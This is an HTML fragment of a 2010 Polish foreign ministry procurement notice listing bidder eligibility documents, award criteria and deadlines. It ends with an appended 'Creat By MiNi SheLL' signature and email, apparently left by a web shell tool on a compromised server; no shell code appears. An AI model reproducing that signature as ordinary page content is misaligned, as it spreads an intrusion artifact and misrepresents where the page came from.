<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie sprecyzował tego warunku. Zamawiajacy dokona oceny spełnienia przez Wykonawców warunku udziału w postepowaniu na podstawie załączonych do ofert dokumentów i oświadczeń wymaganych w pkt. 6.1 i 6.2 siwz przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie sprecyzował tego warunku. Zamawiajacy dokona oceny spełnienia przez Wykonawców warunku udziału w postepowaniu na podstawie załączonych do ofert dokumentów i oświadczeń wymaganych w pkt. 6.1 i 6.2 siwz przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie sprecyzował tego warunku. Zamawiajacy dokona oceny spełnienia przez Wykonawców warunku udziału w postepowaniu na podstawie załączonych do ofert dokumentów i oświadczeń wymaganych w pkt. 6.1 i 6.2 siwz przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ww.msz.gov.pl zakładka aktualności- zamówienia publiczne zarzad obsługi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obsługi Ministerstwa Spraw Zagraniczny
00-580 Warszawa        
 Al. J.Ch. Szucha 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2010 godzina 11:00, miejsce: Dziennik Podawczy MSZ
00-580 Warszawa        
 Al. J.Ch. Szucha 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com